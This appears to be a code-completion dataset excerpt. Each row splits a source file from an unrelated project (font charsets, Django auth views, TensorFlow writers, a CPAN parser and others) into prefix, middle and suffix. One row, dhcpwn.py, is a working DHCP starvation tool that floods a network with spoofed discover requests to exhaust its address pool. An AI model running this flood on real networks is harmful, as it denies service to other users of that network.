repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
ArcherSys/ArcherSys
|
skulpt/src/lib/markupbase.py
|
Python
|
mit
| 73
| 0
|
r
|
aise NotImplementedError("markupbase is not
|
yet implemented in Skulpt")
|
ysrodrigues/Fund-Prog
|
AD1-Exerc2.py
|
Python
|
gpl-3.0
| 1,948
| 0.019608
|
def verificaPalindrome(frase):
removeWhiteSpaces = [] ### Array util para remover os espaços em brancos
removeHypen = [] ### Array util para remover os hifen
palindromo = str(
|
frase).lower().strip() ### Remove os espaços em brancos no inicio e final e coloca toda a palavra em letra minuscula
if (len(palindromo) == 1): ### Se o tamanho da palavra for 1, entao ele deve retornar verdadeiro
return True
### BEGIN - Remover os
|
espaços em branco no meio da frase - BEGIN ###
removeWhiteSpaces = palindromo.split(' ')
palindromo = str()
for word in removeWhiteSpaces:
palindromo = palindromo + word
### END - Remover os espaços em branco no meio da frase - END ###
### BEGIN - Remover hypen no meio da frase - BEGIN ###
removeHypen = palindromo.split('-')
palindromo = str()
for word in removeHypen:
palindromo = palindromo + word
### END - Remover hypen no meio da frase - END ###
if(palindromo[0] == palindromo[-1]): ### Verifica se a primeira e ultima letra sao iguais
return verificaPalindrome(palindromo[1:-1]) ### Remove a 1ª[1] e ultima[-1] letra da palavra
return False
f = open('file.txt', 'r') ### abertura do arquivo genérico de entrada, substituia file.txt pelo nome de arquivo que quiser.
for line in f: ### le as linhas no arquivo genérico de entrada
if (line == "fim"): ### Verifica se a linha esta escrito fim
break ### termina o looping de leitura de linha
elif(verificaPalindrome(line)):
print("E palindromo")
else:
print("Nao e palindromo")
f.close() ### fecha o arquivo génerico de entrada
###### Lendo até o usuário escrever fim ######
while (True):
frase = input() ### Pega o input do usuario
if(frase == "fim"): ### Sai do loop se digitar fim
break
elif(verificaPalindrome(frase)):
print("E palindromo")
else:
print("Nao e palindromo")
|
wdq007/supreme-garbanzo
|
fkkenv/fukoku/env/admin.py
|
Python
|
gpl-3.0
| 461
| 0.02603
|
fr
|
om django.contrib import admin
# Register your models here.
from .models import Environment,EnvironmentAdmin,Component,ComponentAdmin,Environment_property,Environment_propertyAdmin,Component_attribute,Component_attributeAdmin
admin.site.register(Environment,EnvironmentAdmin)
admin.site.register(Component,ComponentAdmin)
admin.site.register(Environment_property,Environment_propertyAdmin)
admin.site.register
|
(Component_attribute,Component_attributeAdmin)
|
davelab6/pyfontaine
|
fontaine/charsets/noto_chars/notosanshebrew_regular.py
|
Python
|
gpl-3.0
| 9,355
| 0.015927
|
# -*- coding: utf-8 -*-
class Charset(object):
common_name = 'NotoSansHebrew-Regular'
native_name = ''
def glyphs(self):
chars = []
chars.append(0x0000) #null ????
chars.append(0x200C) #uni200C ZERO WIDTH NON-JOINER
chars.append(0x000D) #nonmarkingreturn ????
chars.append(0x200E) #uni200E LEFT-TO-RIGHT MARK
chars.append(0x200F) #uni200F RIGHT-TO-LEFT MARK
chars.append(0x0020) #space SPACE
chars.append(0x200D) #uni200D ZERO WIDTH JOINER
chars.append(0x00A0) #space NO-BREAK SPACE
chars.append(0x20AA) #sheqel NEW SHEQEL SIGN
chars.append(0xFEFF) #null ZERO WIDTH NO-BREAK SPACE
chars.append(0xFB1D) #uniFB1D HEBREW LETTER YOD WITH HIRIQ
chars.append(0xFB1E) #uniFB1E HEBREW POINT JUDEO-SPANISH VARIKA
chars.append(0xFB1F) #yodyod_patah HEBREW LIGATURE YIDDISH YOD YOD PATAH
chars.append(0xFB20) #alternativeayin HEBREW LETTER ALTERNATIVE AYIN
chars.append(0xFB21) #alefwide HEBREW LETTER WIDE ALEF
chars.append(0xFB22) #daletwide HEBREW LETTER WIDE DALET
chars.append(0xFB23) #hewide HEBREW LETTER WIDE HE
chars.append(0xFB24) #kafwide HEBREW LETTER WIDE KAF
chars.append(0xFB25) #lamedwide HEBREW LETTER WIDE LAMED
chars.append(0xFB26) #finalmemwide HEBREW LETTER WIDE FINAL MEM
chars.append(0xFB27) #reshwide HEBREW LETTER WIDE RESH
chars.append(0xFB28) #tavwide HEBREW LETTER WIDE TAV
chars.append(0xFB29) #alt_plussign HEBREW LETTER ALTERNATIVE PLUS SIGN
chars.append(0xFB2A) #shinshindot HEBREW LETTER SHIN WITH SHIN DOT
chars.append(0xFB2B) #shinsindot HEBREW LETTER SHIN WITH SIN DOT
chars.append(0xFB2C) #shindageshshindot HEBREW LETTER SHIN WITH DAGESH AND SHIN DOT
chars.append(0xFB2D) #shindageshsindot HEBREW LETTER SHIN WITH DAGESH AND SIN DOT
chars.append(0xFB2E) #alefpatah HEBREW LETTER ALEF WITH PATAH
chars.append(0xFB2F) #alefqamats HEBREW LETTER ALEF WITH QAMATS
chars.append(0xFB30) #alefmapiq HEBREW LETTER ALEF WITH MAPIQ
chars.append(0xFB31) #betdagesh HEBREW LETTER BET WITH DAGESH
chars.append(0xFB32) #gimeldagesh HEBREW LETTER GIMEL WITH DAGESH
chars.append(0xFB33) #daletdagesh HEBREW LETTER DALET WITH DAGESH
chars.append(0xFB34) #hedagesh HEBREW LETTER HE
|
WITH MAPIQ
chars.append(0xFB35) #vavdagesh HEBREW LETTER VAV WITH DAGESH
chars.append(0xFB36) #zayindagesh HEBREW LETTER ZAYIN WITH DAGESH
chars.append(0xFB38) #tetdagesh HEBREW LETTER TET WITH DAGESH
chars.append(0xFB39) #yoddagesh HEBREW LETTER YOD WITH DAGESH
chars.append(0xFB3A) #finalkafdagesh HEBREW LETTER FINAL KAF WITH DAGESH
chars.append(0xFB3B) #kafdagesh HEBREW LETTER KAF WITH DAGESH
chars.append(0xFB3C) #lameddagesh
|
HEBREW LETTER LAMED WITH DAGESH
chars.append(0xFB3E) #memdagesh HEBREW LETTER MEM WITH DAGESH
chars.append(0xFB40) #nundagesh HEBREW LETTER NUN WITH DAGESH
chars.append(0xFB41) #samekhdagesh HEBREW LETTER SAMEKH WITH DAGESH
chars.append(0xFB43) #finalpedagesh HEBREW LETTER FINAL PE WITH DAGESH
chars.append(0xFB44) #pedagesh HEBREW LETTER PE WITH DAGESH
chars.append(0xFB46) #tsadidagesh HEBREW LETTER TSADI WITH DAGESH
chars.append(0xFB47) #qofdagesh HEBREW LETTER QOF WITH DAGESH
chars.append(0xFB48) #reshdagesh HEBREW LETTER RESH WITH DAGESH
chars.append(0xFB49) #shindagesh HEBREW LETTER SHIN WITH DAGESH
chars.append(0xFB4A) #tavdagesh HEBREW LETTER TAV WITH DAGESH
chars.append(0xFB4B) #vavholam HEBREW LETTER VAV WITH HOLAM
chars.append(0xFB4C) #betrafe HEBREW LETTER BET WITH RAFE
chars.append(0xFB4D) #kafrafe HEBREW LETTER KAF WITH RAFE
chars.append(0xFB4E) #perafe HEBREW LETTER PE WITH RAFE
chars.append(0xFB4F) #aleflamed HEBREW LIGATURE ALEF LAMED
chars.append(0x0591) #uni0591 HEBREW ACCENT ETNAHTA
chars.append(0x0592) #uni0592 HEBREW ACCENT SEGOL
chars.append(0x0593) #uni0593 HEBREW ACCENT SHALSHELET
chars.append(0x0594) #uni0594 HEBREW ACCENT ZAQEF QATAN
chars.append(0x0595) #uni0595 HEBREW ACCENT ZAQEF GADOL
chars.append(0x0596) #uni0596 HEBREW ACCENT TIPEHA
chars.append(0x0597) #uni0597 HEBREW ACCENT REVIA
chars.append(0x0598) #uni0598 HEBREW ACCENT ZARQA
chars.append(0x0599) #uni0599 HEBREW ACCENT PASHTA
chars.append(0x059A) #uni059A HEBREW ACCENT YETIV
chars.append(0x059B) #uni059B HEBREW ACCENT TEVIR
chars.append(0x059C) #uni059C HEBREW ACCENT GERESH
chars.append(0x059D) #uni059D HEBREW ACCENT GERESH MUQDAM
chars.append(0x059E) #uni059E HEBREW ACCENT GERSHAYIM
chars.append(0x059F) #uni059F HEBREW ACCENT QARNEY PARA
chars.append(0x05A0) #uni05A0 HEBREW ACCENT TELISHA GEDOLA
chars.append(0x05A1) #uni05A1 HEBREW ACCENT PAZER
chars.append(0x05A2) #uni05A2 HEBREW ACCENT ATNAH HAFUKH
chars.append(0x05A3) #uni05A3 HEBREW ACCENT MUNAH
chars.append(0x05A4) #uni05A4 HEBREW ACCENT MAHAPAKH
chars.append(0x05A5) #uni05A5 HEBREW ACCENT MERKHA
chars.append(0x05A6) #uni05A6 HEBREW ACCENT MERKHA KEFULA
chars.append(0x05A7) #uni05A7 HEBREW ACCENT DARGA
chars.append(0x05A8) #uni05A8 HEBREW ACCENT QADMA
chars.append(0x05A9) #uni05A9 HEBREW ACCENT TELISHA QETANA
chars.append(0x05AA) #uni05AA HEBREW ACCENT YERAH BEN YOMO
chars.append(0x05AB) #uni05AB HEBREW ACCENT OLE
chars.append(0x05AC) #uni05AC HEBREW ACCENT ILUY
chars.append(0x05AD) #uni05AD HEBREW ACCENT DEHI
chars.append(0x05AE) #uni05AE HEBREW ACCENT ZINOR
chars.append(0x05AF) #uni05AF HEBREW MARK MASORA CIRCLE
chars.append(0x05B0) #sheva HEBREW POINT SHEVA
chars.append(0x05B1) #hatafsegol HEBREW POINT HATAF SEGOL
chars.append(0x05B2) #hatafpatah HEBREW POINT HATAF PATAH
chars.append(0x05B3) #hatafqamats HEBREW POINT HATAF QAMATS
chars.append(0x05B4) #hiriq HEBREW POINT HIRIQ
chars.append(0x05B5) #tsere HEBREW POINT TSERE
chars.append(0x05B6) #segol HEBREW POINT SEGOL
chars.append(0x05B7) #patah HEBREW POINT PATAH
chars.append(0x05B8) #qamats HEBREW POINT QAMATS
chars.append(0x05B9) #holam HEBREW POINT HOLAM
chars.append(0x05BA) #uni05BA HEBREW POINT HOLAM HASER FOR VAV
chars.append(0x05BB) #qubuts HEBREW POINT QUBUTS
chars.append(0x05BC) #dagesh HEBREW POINT DAGESH OR MAPIQ
chars.append(0x05BD) #meteg HEBREW POINT METEG
chars.append(0x05BE) #maqaf HEBREW PUNCTUATION MAQAF
chars.append(0x05BF) #rafe HEBREW POINT RAFE
chars.append(0x05C0) #paseq HEBREW PUNCTUATION PASEQ
chars.append(0x05C1) #shindot HEBREW POINT SHIN DOT
chars.append(0x05C2) #sindot HEBREW POINT SIN DOT
chars.append(0x05C3) #sofpasuq HEBREW PUNCTUATION SOF PASUQ
chars.append(0x05C4) #upper_dot HEBREW MARK UPPER DOT
chars.append(0x05C5) #lowerdot HEBREW MARK LOWER DOT
chars.append(0x05C6) #uni05C6 HEBREW PUNCTUATION NUN HAFUKHA
chars.append(0x05C7) #qamatsqatan HEBREW POINT QAMATS QATAN
chars.append(0x25CC) #uni25CC DOTTED CIRCLE
chars.append(0x05D0) #alef HEBREW LETTER ALEF
chars.append(0x05D1) #bet HEBREW LETTER BET
chars.append(0x05D2) #gimel HEBREW LETTER GIMEL
chars.append(0x05D3) #dalet HEBREW LETTER DALET
chars.append(0x05D4) #he HEBREW LETTER HE
chars.append(0x05D5) #vav HEBREW LETTER VAV
chars.append(0x05D6) #zayin HEBREW LETTER ZAYIN
chars.append(0x05D7) #het HEBREW LETTER HET
chars.append(0x05D8) #tet HEBREW LETTER TET
chars.append(0x05D9) #yod HEBREW LETTER YOD
chars.append(0x05DA) #finalkaf HEBREW LETTER FINAL KAF
chars.append(0x05DB) #kaf HEBREW LETTER KAF
chars.append(0x05DC) #lamed HEBREW LETTER LAMED
|
mschwager/dhcpwn
|
dhcpwn.py
|
Python
|
gpl-3.0
| 2,829
| 0
|
#!/usr/bin/env python3
import argparse
import logging
import string
# Quiet scapy
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy import volatile # noqa: E402
from scapy import sendrecv # noqa: E402
from scapy import config # noqa: E402
from scapy.layers import l2 # noqa: E402
from scapy.layers import inet # noqa: E402
from scapy.layers import dhcp # noqa: E402
# Configuration requires these imports to properly initialize
from scapy import route # noqa: E402, F401
from scapy import route6 # noqa: E402, F401
def dhcp_flood(**kwargs):
iface = kwargs["interface"]
count = kwargs["count"]
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
packet = (
l2.Ether(dst="ff:ff:ff:ff:ff:ff") /
inet.IP(src="0.0.0.0", dst="255.255.255.255") /
inet.UDP(sport=68, dport=67) /
dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) /
dhcp.DHCP(options=[("message-type", "discover"), "end"])
)
sendrecv.sendp(
packet,
iface=iface,
count=count
)
def print_dhcp_response(response):
print("Source: {}".format(response[l2.Ether].src))
print("Destination: {}".format(response[l2.Ether].dst))
for option in response[dhcp.DHCP].options:
if isinstance(option, tuple):
option, *values = option
else:
# For some reason some options are strings instead of tuples
option, *values = option, None
if option in ["end", "pad"]:
break
output = "Option: {} -> {}".format(option, values)
if option == "message-type" and len(values) == 1:
dhcp_type = dhcp.DHCPTypes.get(values[0], "unknown")
output = "{} ({})".format(output, dhcp_type)
print(output)
def dhcp_sniff(**kwargs):
sendrecv.sniff(filter="udp and (port 67 or 68)", prn=print_dhcp_response)
def parse_args():
p = argparse.ArgumentParser(description='''
All your IPs are belong to us.
''', formatter_class=argparse.RawTextHelpFormatter)
p.add_argument(
'-i',
'--interface',
action='store',
default=config.conf.iface,
help='network interface to use'
)
subparsers = p.add_subparsers(dest='command')
subparsers.required = True
flood = subparsers.add_parser('flood')
flood.add_argument(
'-c',
|
'--count',
action='store',
default=10,
type=int,
help='number of addresses to consume'
)
subparsers.add_parser('sniff')
args = p.parse_args()
return args
def main():
args = parse_args()
dispatch = {
"flood": dhcp_flood,
"sniff": dhcp_sniff,
}
dispatch[args.command](
|
**vars(args))
if __name__ == "__main__":
main()
|
repology/repology
|
repology/parsers/parsers/cpan.py
|
Python
|
gpl-3.0
| 4,152
| 0.002168
|
# Copyright (C) 2016-2019 Dmitry Marakasov <amdmi3@amdmi3.ru>
#
# This file is part of repology
#
# repology is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# repology is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with repology. If not, see <http://www.gnu.org/licenses/>.
from typing import Iterable
from repology.logger import Logger
from repology.packagemaker import NameType, PackageFactory, PackageMaker
from repology.parsers import Parser
from repology.parsers.maintainers import extract_maintainers
class CPANPackagesParser(Parser):
def iter_parse(self, path: str, factory: PackageFactory) -> Iterable[PackageMaker]:
# Since data we get from CPAN is somewhat lacking, we need
# somewhat complex parsing. Here's the example of what we get
# in 02packages.details.txt package index downloaded from CPAN:
#
# Acme::constant 0.001003 G/GL/GLITCHMR/Acme-constant-0.1.3.tar.gz
# Acme::Constructor::Pythonic 0.002 T/TO/TOBYINK/Acme-Constructor-Pythonic-0.002.tar.gz
# Acme::Continent undef P/PE/PERIGRIN/XML-Toolkit-0.15.tar.gz
#
# 1. Module version (second column) does not always correspond
# to package version (which we need), so we need to parse
# package filename. The version may also be undefined.
# 2. All package modules are listed, and we don't need them
# (which is not the problem as CPAN repo is shadow anyway)
#
# So we do out best to parse filename into package name and
# actual version, and filter entries where module name is
# equal to package name. Some entries are lost, some entries
# are not even in 02packages.details.txt, some are unparsable
# (no version, or garbage in version) but these are negligible.
with open(path) as packagesfile:
skipping_header = True
for nline, line in enumerate(packagesfile, 1):
line = line.strip()
if skipping_header:
if line == '':
skipping_header = False
continue
pkg = factory.begin('line {}'.format(nline))
module, version, package = line.split(None, 2)
package_path, package_file = package.rsplit('/', 1)
package_name = None
for ext in ['.tar.gz', '.tar.bz2', '.zip', '.tgz']:
if package_file.endswith(ext):
package_name = package_file[0:-len(ext)]
break
if package_name is None or '-' not in package_name:
pkg.lo
|
g('unable to parse package name', Logger.ERROR)
continue
package_name, package_version = package_name.rsplit('-', 1)
if package_version.st
|
artswith('v') or package_version.startswith('V'):
package_version = package_version[1:]
if not package_version[0].isdecimal():
pkg.log('skipping bad version {}'.format(package_version), Logger.ERROR)
continue
if module.replace('::', '-').lower() != package_name.lower():
pkg.log('skipping submodule {}'.format(module), Logger.WARNING)
continue
pkg.add_name(package_name, NameType.CPAN_NAME)
pkg.set_version(package_version)
pkg.add_maintainers(extract_maintainers(package_path.split('/')[2].lower() + '@cpan'))
pkg.add_homepages('http://search.cpan.org/dist/' + package_name + '/')
yield pkg
|
googleinterns/via-content-understanding
|
VideoClassification/SegmentLevelClassifier/writer.py
|
Python
|
apache-2.0
| 13,749
| 0.014183
|
"""Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Writer file used to serialize and save data to TFRecords files.
"""
import numpy as np
import os
import pandas as pd
import tensorflow as tf
def add_candidate_content(context, candidates):
"""Add the tensor for the classes this particular video is a candidate for.
Args:
context: context of the video
candidates: dictionary of candidates. Key is video id and value is list of candidate classes
"""
video_id = tf.convert_to_tensor(context["id"])[0].numpy()
if video_id in candidates.keys():
context["candidate_labels"] = np.array(candidates[video_id])
else:
context["candidate_labels"] = np.array([])
return context
def convert_labels(labels, class_csv="vocabulary.csv"):
"""Convert labels from range [0,3861] to range [0,1000]
Args:
labels: Tensor of labels to be converted
class_csv: csv file containing conversion details
"""
class_dataframe = pd.read_csv(class_csv, index_col=0)
class_indices = class_dataframe.index.tolist()
class_indices = np.array(class_indices)
labels = labels.numpy()
new_labels = []
for label in labels:
check = np.nonzero(class_indices == label)[0]
if len(check) > 0:
new_label = check.tolist()[0]
new_labels.append(new_label)
return tf.convert_to_tensor(new_labels)
def convert_to_feature(item, type):
"""Convert item to FeatureList.
Args:
item: item to be converted
type: string denoting the type of item. Can be "float", "byte", or "int"
"""
if type == "float":
item = tf.train.FloatList(value=item)
item = tf.train.Feature(float_list=item)
elif type == "byte":
item = tf.train.BytesList(value=item)
item = tf.train.Feature(bytes_list=item)
elif type == "int":
item = tf.train.Int64List(value=item)
item = tf.train.Feature(int64_list=item)
else:
print("Invalid type entered for converting feature")
return item
def serialize_features(features):
"""Serialize features.
Args:
features: features of the video
"""
audio = features["audio"][0].numpy().tostring()
rgb = features["rgb"][0].numpy().tostring()
audio = convert_to_feature([audio], "byte")
rgb = convert_to_feature([rgb], "byte")
features = {
|
"audio": tf.train.FeatureList(feature=[audio]), "rg
|
b": tf.train.FeatureList(feature=[rgb])}
features = tf.train.FeatureLists(feature_list=features)
return features
def serialize_class_features(features):
"""Serialize features.
Args:
features: features of the video
"""
audio = features["audio"].tostring()
rgb = features["rgb"].tostring()
class_features = features["class_features"]
audio = convert_to_feature([audio], "byte")
rgb = convert_to_feature([rgb], "byte")
class_features = convert_to_feature(class_features, "float")
features = {"audio": tf.train.FeatureList(feature=[audio]), "rgb": tf.train.FeatureList(feature=[rgb]), "class_features": tf.train.FeatureList(feature=[class_features])}
features = tf.train.FeatureLists(feature_list=features)
return features
def serialize_combined_features(features):
"""Serialize features.
Args:
features: features of the video
"""
audio = features["audio"][0].numpy().tostring()
rgb = features["rgb"][0].numpy().tostring()
audio = convert_to_feature([audio], "byte")
rgb = convert_to_feature([rgb], "byte")
feature_list = []
for class_feature in features["class_features"]:
feature_list.append(convert_to_feature(class_feature, "float"))
class_features = tf.train.FeatureList(feature=feature_list)
features = {"audio": tf.train.FeatureList(feature=[audio]), "rgb": tf.train.FeatureList(feature=[rgb]), "class_features": class_features}
features = tf.train.FeatureLists(feature_list=features)
return features
def serialize_video_context(context):
"""Serialize context for a video.
Args:
context: context of the video
"""
video_id = tf.convert_to_tensor(context["id"])[0]
labels = context["labels"].values
segment_labels = context["segment_labels"].values
segment_start_times = context["segment_start_times"].values
segment_scores = context["segment_scores"].values
candidate_labels = context["candidate_labels"]
labels = convert_labels(labels)
segment_labels = convert_labels(segment_labels)
context["id"] = convert_to_feature([video_id.numpy()], "byte")
context["labels"] = convert_to_feature(labels.numpy(), "int")
context["segment_labels"] = convert_to_feature(segment_labels.numpy(), "int")
context["segment_start_times"] = convert_to_feature(segment_start_times.numpy(), "int")
context["segment_scores"] = convert_to_feature(segment_scores.numpy(), "float")
context["candidate_labels"] = convert_to_feature(candidate_labels, "int")
context = tf.train.Features(feature=context)
return context
def serialize_segment_context(context, pipeline_type):
"""Serialize context for a segment.
Args:
context: context of the video
pipeline_type: type of pipeline. Can be train or test
"""
video_id = tf.convert_to_tensor(context["id"])[0]
segment_label = context["segment_label"]
segment_start_time = context["segment_start_time"]
segment_score = context["segment_score"]
if pipeline_type == "train":
segment_label = convert_labels(segment_label)
context["id"] = convert_to_feature([video_id.numpy()], "byte")
context["segment_label"] = convert_to_feature(segment_label.numpy(), "int")
context["segment_start_time"] = convert_to_feature(segment_start_time.numpy(), "int")
context["segment_score"] = convert_to_feature(segment_score.numpy(), "float")
if pipeline_type == "test":
segment_id = context["segment_id"]
candidate_label = context["candidate_label"]
context["segment_id"] = convert_to_feature([segment_id],"int")
context["candidate_label"] = convert_to_feature([candidate_label], "int")
context = tf.train.Features(feature=context)
return context
def serialize_class_segment_context(context, pipeline_type):
"""Serialize context for a segment from class feature generation.
Args:
context: context of the video
pipeline_type: type of pipeline. Can be train or test
"""
segment_label = context["segment_label"]
segment_start_time = context["segment_start_time"]
context["id"] = convert_to_feature([context["id"]], "byte")
context["segment_label"] = convert_to_feature(segment_label.numpy(), "int")
context["segment_start_time"] = convert_to_feature(segment_start_time.numpy(), "int")
context["segment_score"] = convert_to_feature([context["segment_score"]], "float")
if pipeline_type == "test":
segment_id = context["segment_id"].numpy()
candidate_label = context["candidate_label"].numpy()
context["segment_id"] = convert_to_feature(segment_id,"int")
context["candidate_label"] = convert_to_feature(candidate_label, "int")
context = tf.train.Features(feature=context)
return context
def serialize_combined_context(context):
"""Serialize context for a segment from class feature generation.
Args:
context: context of the video
"""
context["id"] = convert_to_feature([context["id"]], "byte")
context["segment_label"] = convert_to_feature(context["segment_label"].numpy(), "int")
context = tf.train.Features(feature=context)
return context
def serialize_data(context, features, type, pipeline_type="train"):
"""Serialize video or segment from context and features.
Args:
context: context of the video
features: features of the video
type: type of data to store. Can either be video, segment, or csf.
pipeline_type: type of pipeline. Can be train or test
"""
if type == "video":
context = serialize_video_context(co
|
rockychen-dpaw/oim-cms
|
core/views.py
|
Python
|
apache-2.0
| 11,814
| 0.001608
|
from django.http import HttpResponseRedirect, HttpResponse, HttpResponseForbidden
from django.contrib.auth import login, logout
from django.core.cache import cache
from django.shortcuts import render
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from ipware.ip import get_ip
import json
import base64
import hashlib
import adal
from wagtail.wagtailcore.models import PageRevision
from wagtail.wagtailsearch.models import Query
from core.models import Content, UserSession
from oim_cms.api import WhoAmIResource
from django.contrib.auth.models import User
from tracking.models import DepartmentUser
from django.views.decorators.cache import never_cache
def force_email(username):
if username.find("@") == -1:
candidates = User.objects.filter(
username__iexact=username)
if not candidates:
return None
return candidates[0].email
return username
def adal_authenticate(email, password):
try:
context = adal.AuthenticationContext(settings.AZUREAD_AUTHORITY)
token = context.acquire_token_with_username_password(
settings.AZUREAD_RESOURCE, email, password,
settings.SOCIAL_AUTH_AZUREAD_OAUTH2_KEY,
settings.SOCIAL_AUTH_AZUREAD_OAUTH2_SECRET
)
except adal.adal_error.AdalError:
return None
candidates = User.objects.filter(email__iexact=token['userId'])
if candidates.exists():
return candidates[0]
else:
return None
def shared_id_authenticate(email, shared_id):
us = UserSession.objects.filter(user__email__iexact=email).order_by('-session__expire_date')
if (not us.exists()) or (us[0].shared_id != shared_id):
return None
return us[0].user
@csrf_exempt
@never_cache
def auth_get(request):
# If user is using SSO, do a normal auth check.
if request.user.is_authenticated():
return auth(request)
if 'sso_user' in request.GET and 'sso_shared_id' in request.GET:
user = shared_id_authenticate(request.GET.get('sso_user'),
request.GET.get('sso_shared_id'))
if user:
response = HttpResponse(json.dumps(
{'email': user.email, 'shared_id': request.GET.get('sso_shared_id')
}), content_type='application/json')
response["X-email"] = user.email
response["X-shared-id"] = request.GET.get('sso_shared_id')
return response
return HttpResponseForbidden()
@csrf_exempt
@never_cache
def auth_dual(request):
# If user has a SSO cookie, do a normal auth check.
if reque
|
st.user.is_authenticated():
return auth(request)
# else return an empty response
response = HttpResponse('{}', content_type='application/json')
return response
@csrf_exempt
@never_cache
def auth_ip(request):
# Get the IP of the current user, try and match it up to a session.
current_ip = get_ip(request)
# If there'
|
s a basic auth header, perform a check.
basic_auth = request.META.get("HTTP_AUTHORIZATION")
if basic_auth:
# Check basic auth against Azure AD as an alternative to SSO.
username, password = base64.b64decode(
basic_auth.split(" ", 1)[1].strip()).decode('utf-8').split(":", 1)
username = force_email(username)
user = shared_id_authenticate(username, password)
if not user:
user = adal_authenticate(username, password)
if user:
response = HttpResponse(json.dumps(
{'email': user.email, 'client_logon_ip': current_ip}), content_type='application/json')
response["X-email"] = user.email
response["X-client-logon-ip"] = current_ip
return response
# If user has a SSO cookie, do a normal auth check.
if request.user.is_authenticated():
return auth(request)
# We can assume that the Session and UserSession tables only contain
# current sessions.
qs = UserSession.objects.filter(
session__isnull=False,
ip=current_ip).order_by("-session__expire_date")
headers = {'client_logon_ip': current_ip}
if qs.exists():
user = qs[0].user
headers["email"] = user.email
try:
headers["kmi_roles"] = DepartmentUser.objects.get(
email__iexact=user.email).extra_data.get("KMIRoles", '')
except:
headers["kmi_roles"] = ''
response = HttpResponse(json.dumps(headers), content_type='application/json')
for key, val in headers.items():
key = "X-" + key.replace("_", "-")
response[key] = val
return response
@csrf_exempt
@never_cache
def auth(request):
# grab the basic auth data from the request
basic_auth = request.META.get("HTTP_AUTHORIZATION")
basic_hash = hashlib.sha1(basic_auth.encode('utf-8')).hexdigest() if basic_auth else None
# store the access IP in the current user session
if request.user.is_authenticated():
try:
usersession = UserSession.objects.get(
session_id=request.session.session_key)
except UserSession.DoesNotExist:
# If the user does not have a UserSession, log them out and return 401 Unauthorised.
logout(request)
return HttpResponse('Unauthorized', status=401)
current_ip = get_ip(request)
if usersession.ip != current_ip:
usersession.ip = current_ip
usersession.save()
# check the cache for a match for the basic auth hash
if basic_hash:
cachekey = "auth_cache_{}".format(basic_hash)
content = cache.get(cachekey)
if content:
response = HttpResponse(content[0], content_type='application/json')
for key, val in content[1].items():
response[key] = val
response["X-auth-cache-hit"] = "success"
# for a new session using cached basic auth, reauthenticate
if not request.user.is_authenticated():
user = User.objects.get(email__iexact=content[1]['X-email'])
user.backend = "django.contrib.auth.backends.ModelBackend"
login(request, user)
return response
# check the cache for a match for the current session key
cachekey = "auth_cache_{}".format(request.session.session_key)
content = cache.get(cachekey)
# return a cached response ONLY if the current session has an authenticated user
if content and request.user.is_authenticated():
response = HttpResponse(content[0], content_type='application/json')
for key, val in content[1].items():
response[key] = val
response["X-auth-cache-hit"] = "success"
return response
cache_basic = False
if not request.user.is_authenticated():
# Check basic auth against Azure AD as an alternative to SSO.
try:
if basic_auth is None:
raise Exception('Missing credentials')
username, password = base64.b64decode(
basic_auth.split(" ", 1)[1].strip()).decode('utf-8').split(":", 1)
username = force_email(username)
# first check for a shared_id match
# if yes, provide a response, but no session cookie
# (hence it'll only work against certain endpoints)
user = shared_id_authenticate(username, password)
if user:
response = HttpResponse(json.dumps(
{'email': user.email, 'shared_id': password
}), content_type='application/json')
response["X-email"] = user.email
response["X-shared-id"] = password
return response
# after that, check against Azure AD
user = adal_authenticate(username, password)
# basic auth using username/password will generate a session cookie
if user:
user.backend = "django.contrib.auth.backends.ModelBackend"
login(request, user)
cache_basic = True
else:
raise Exception('Authentication faile
|
ActiveState/code
|
recipes/Python/298336_http__Exploring_Headers_Cookies/recipe-298336.py
|
Python
|
mit
| 9,871
| 0.005471
|
#!/usr/bin/python -u
# 18-08-04
# v1.1.1
# http.py
# A simple CGI script, to explore http headers, cookies etc.
# Copyright Michael Foord
# Free to use, modify and relicense.
# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!
# E-mail or michael AT foord DOT me DOT uk
# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
"""
This CGI script allows you to specify a URL using an HTML form.
It will fetch the specified URL and print the headers from the server.
It will also handle cookies using ClientCookie - if it's available.
It is based on approx.py the CGI-proxy I'm building.
It includes authentication circuitry and I'm using it to understand http authentication.
This script shows using urllib2 to fetch a URL with a request object including User-Agent header and basic authentication.
It also shows the possible http errors - using a dictionary 'borrowed' from BaseHTTPServer
"""
################################################################
# Imports
try:
import cgitb; cgitb.enable()
except:
pass
import os, sys, cgi, pickle
from time import strftime
import urllib2
sys.stderr = sys.stdout
READSIZE = 4000
COOKIEFILE = 'cookies.lwp'
try:
import ClientCookie
openfun = ClientCookie.urlopen
reqfun = ClientCookie.Request
cj = ClientCookie.LWPCookieJar()
if os.path.isfile(COOKIEFILE):
cj.load(COOKIEFILE)
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
ClientCookie.install_opener(opener)
except:
ClientCookie = None
openfun = urllib2.urlopen
reqfun = urllib2.Request
###############################################################
# Nicked from BaseHTTPServer
# This is the basic table of HTTP errors
errorlist = { 400: ('Bad Request',
'The Server thinks your request was malformed.'),
401: ('Unauthorized',
'No permission -- see authorization schemes'),
402: ('Payment required',
'No payment -- see charging schemes'),
403: ('Forbidden',
'Request forbidden -- authorization will not help'),
